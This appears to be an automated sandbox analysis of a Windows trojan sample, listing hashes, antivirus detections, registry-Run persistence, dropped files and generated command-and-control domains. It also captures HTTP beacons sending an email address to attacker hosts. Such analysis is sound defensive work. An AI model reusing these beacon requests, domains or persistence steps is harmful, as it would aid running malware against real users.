Analysis Date2015-08-12 09:38:31
MD5668e98f169c358aa53ae318cf79fe9bb
SHA16d605747de2aa345bcaf5f2e22b03c6793b94ef1

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: e92f4a3c5cbc36ff8647ad7fbe713b30 sha1: 08a47eb473ee24198b9085184a5f6056102f85c0 size: 299008
Section.rdata md5: 38331fdcd8623a6c5ec1ea221bc778a3 sha1: fec02edf0cdf59d23b6bec3c5b61202d277f071a size: 34816
Section.data md5: 6c5a41b1d76e727fc53e79a9b1fe2afa sha1: f53116c43795601748f6d50041b656fc5e8c199a size: 103936
Timestamp2015-01-29 10:26:22
PackerMicrosoft Visual C++ ?.?
PEhash88cb5c34be3d9c8177629f5b9344e6a06df1aeae
IMPhash9b960c19901ee8a5f2f73be8d54ec22e
AVRisingno_virus
AVCA (E-Trust Ino)no_virus
AVF-SecureGen:Variant.Symmi.22722
AVDr. WebTrojan.DownLoader13.35054
AVClamAVno_virus
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVBullGuardGen:Variant.Symmi.22722
AVPadvishno_virus
AVVirusBlokAda (vba32)no_virus
AVCAT (quickheal)Trojan.Dynamer.AC3
AVTrend MicroTSPY_NIVDORT.SMB
AVKasperskyTrojan.Win32.Generic
AVZillya!no_virus
AVEmsisoftGen:Variant.Symmi.22722
AVIkarusTrojan.Win32.Agent
AVFrisk (f-prot)no_virus
AVAuthentiumW32/Wonton.B.gen!Eldorado
AVMalwareBytesTrojan.Zbot.WHE
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.BD
AVK7Trojan ( 004cb2771 )
AVBitDefenderGen:Variant.Symmi.22722
AVFortinetW32/Agent.VNC!tr
AVSymantecDownloader.Upatre!g15
AVGrisoft (avg)Win32/Cryptor
AVEset (nod32)Win32/Agent.VNC
AVAlwil (avast)Downloader-TLD [Trj]
AVAd-AwareGen:Variant.Symmi.22722
AVTwisterTrojan.Agent.VNC.aanx.mg
AVAvira (antivir)TR/Crypt.ZPACK.Gen8
AVMcafeeTrojan-FEMT!668E98F169C3

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\TP Extensible BranchCache Trap AutoConnect ➝
C:\Documents and Settings\Administrator\Application Data\axjdweetwez\filicvnd.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\axjdweetwez\filicvnd.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\axjdweetwez\filicvnd.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\axjdweetwez\filicvnd.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\axjdweetwez\wqqrncyq.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\axjdweetwez\filicvnd.rcu
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\axjdweetwez\filicvnd.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\axjdweetwez\filicvnd.exe"

Network Details:

DNSbuildingcharge.net
Type: A
195.22.26.231
DNSbuildingcharge.net
Type: A
195.22.26.252
DNSbuildingcharge.net
Type: A
195.22.26.253
DNSbuildingcharge.net
Type: A
195.22.26.254
DNSfellowsingle.net
Type: A
95.211.230.75
DNSresultperiod.net
Type: A
DNSbrokenhowever.net
Type: A
DNSresulthowever.net
Type: A
DNSpreparechoose.net
Type: A
DNSdesirechoose.net
Type: A
DNSpreparealthough.net
Type: A
DNSdesirealthough.net
Type: A
DNSprepareperiod.net
Type: A
DNSdesireperiod.net
Type: A
DNSpreparehowever.net
Type: A
DNSdesirehowever.net
Type: A
DNSstrengthchoose.net
Type: A
DNSstillchoose.net
Type: A
DNSstrengthalthough.net
Type: A
DNSstillalthough.net
Type: A
DNSstrengthperiod.net
Type: A
DNSstillperiod.net
Type: A
DNSstrengthhowever.net
Type: A
DNSstillhowever.net
Type: A
DNSmovementsingle.net
Type: A
DNSoutsidesingle.net
Type: A
DNSmovementcharge.net
Type: A
DNSoutsidecharge.net
Type: A
DNSmovementdifference.net
Type: A
DNSoutsidedifference.net
Type: A
DNSmovementevery.net
Type: A
DNSoutsideevery.net
Type: A
DNSbuildingsingle.net
Type: A
DNSeveningsingle.net
Type: A
DNSeveningcharge.net
Type: A
DNSbuildingdifference.net
Type: A
DNSeveningdifference.net
Type: A
DNSbuildingevery.net
Type: A
DNSeveningevery.net
Type: A
DNSstoresingle.net
Type: A
DNSmightsingle.net
Type: A
DNSstorecharge.net
Type: A
DNSmightcharge.net
Type: A
DNSstoredifference.net
Type: A
DNSmightdifference.net
Type: A
DNSstoreevery.net
Type: A
DNSmightevery.net
Type: A
DNSdoctorsingle.net
Type: A
DNSprettysingle.net
Type: A
DNSdoctorcharge.net
Type: A
DNSprettycharge.net
Type: A
DNSdoctordifference.net
Type: A
DNSprettydifference.net
Type: A
DNSdoctorevery.net
Type: A
DNSprettyevery.net
Type: A
DNSdoublesingle.net
Type: A
DNSfellowcharge.net
Type: A
DNSdoublecharge.net
Type: A
DNSfellowdifference.net
Type: A
DNSdoubledifference.net
Type: A
DNSfellowevery.net
Type: A
DNSdoubleevery.net
Type: A
DNSbrokensingle.net
Type: A
DNSresultsingle.net
Type: A
DNSbrokencharge.net
Type: A
DNSresultcharge.net
Type: A
DNSbrokendifference.net
Type: A
DNSresultdifference.net
Type: A
DNSbrokenevery.net
Type: A
DNSresultevery.net
Type: A
DNSpreparesingle.net
Type: A
DNSdesiresingle.net
Type: A
DNSpreparecharge.net
Type: A
DNSdesirecharge.net
Type: A
DNSpreparedifference.net
Type: A
DNSdesiredifference.net
Type: A
DNSprepareevery.net
Type: A
DNSdesireevery.net
Type: A
DNSstrengthsingle.net
Type: A
DNSstillsingle.net
Type: A
DNSstrengthcharge.net
Type: A
DNSstillcharge.net
Type: A
DNSstrengthdifference.net
Type: A
DNSstilldifference.net
Type: A
DNSstrengthevery.net
Type: A
DNSstillevery.net
Type: A
DNSexpectmatter.net
Type: A
DNSbecausematter.net
Type: A
HTTP GEThttp://buildingcharge.net/index.php?email=office@moldoglass.ro&method=post&len
User-Agent:
HTTP GEThttp://fellowsingle.net/index.php?email=office@moldoglass.ro&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 195.22.26.231:80
Flows TCP192.168.1.1:1032 ➝ 95.211.230.75:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f6666 69636540 6d6f6c64   mail=office@mold
0x00000020 (00032)   6f676c61 73732e72 6f266d65 74686f64   oglass.ro&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206275 696c6469   se..Host: buildi
0x00000070 (00112)   6e676368 61726765 2e6e6574 0d0a0d0a   ngcharge.net....
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f6666 69636540 6d6f6c64   mail=office@mold
0x00000020 (00032)   6f676c61 73732e72 6f266d65 74686f64   oglass.ro&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206665 6c6c6f77   se..Host: fellow
0x00000070 (00112)   73696e67 6c652e6e 65740d0a 0d0a0d0a   single.net......
0x00000080 (00128)                                         


Strings